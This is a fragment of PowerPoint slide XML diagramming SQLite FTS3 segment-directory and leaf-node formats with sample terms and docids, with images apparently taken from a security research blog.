            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17938482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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>tablename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>`_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>segdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Table</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="https://blog.exodusintel.com/wp-content/uploads/2019/01/b-tre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0225" y="1574994"/>
            <a:ext cx="6837750" cy="480714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2547260" y="6092891"/>
            <a:ext cx="4991875" cy="21460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Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2537929" y="1772817"/>
            <a:ext cx="6531425" cy="4301866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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31218410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Leaf node format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30722" name="Picture 2" descr="https://blog.exodusintel.com/wp-content/uploads/2019/01/leaf_nod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968" y="2032229"/>
            <a:ext cx="11188063" cy="38359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72413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21069" y="2950158"/>
            <a:ext cx="8522057" cy="881311"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834357" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279419" y="2950158"/>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824159" y="2950158"/>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92708" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2951058" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3817068" y="2950158"/>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930356" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828450" y="2950157"/>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936877" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381939"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486480" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931542"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6043073" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ril</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508815"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6619019" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492487" y="2950157"/>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7593881" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038943"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8140336" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8585398"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686790" y="3178465"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>pie</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236561" y="293742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9346764" y="3041335"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="3935930"/>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7384426" y="3935930"/>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5700201" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6612026" y="4184077"/>
            <a:ext cx="772402" cy="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8" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="4184077"/>
            <a:ext cx="772401" cy="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7570807" y="3935808"/>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65978" y="3935808"/>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8412040" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9323865" y="4183956"/>
            <a:ext cx="842114"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5" name="Straight Connector 64"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570807" y="4183956"/>
            <a:ext cx="841233"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1788177" y="3934696"/>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720024" y="3934696"/>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2798188" y="3990240"/>
            <a:ext cx="911825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Connector 49"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3710013" y="4174906"/>
            <a:ext cx="1010011" cy="917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1" name="Straight Connector 50"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1788177" y="4174906"/>
            <a:ext cx="1010011" cy="9171"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2222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707127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21069" y="2950158"/>
            <a:ext cx="8522057" cy="881311"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1834357" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279419" y="2950158"/>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824159" y="2950158"/>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92708" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2951058" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3817068" y="2950158"/>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930356" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828450" y="2950157"/>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936877" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381939"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486480" y="3207976"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5931542"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6043073" y="3207976"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ril</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508815"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6619019" y="3070846"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492487" y="2950157"/>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7593881" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038943"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8140336" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8585398"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686790" y="3178465"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>pie</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236561" y="293742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9346764" y="3041335"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="3935930"/>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7384426" y="3935930"/>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5700201" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56"/>
          <p:cNvCxnSpPr>
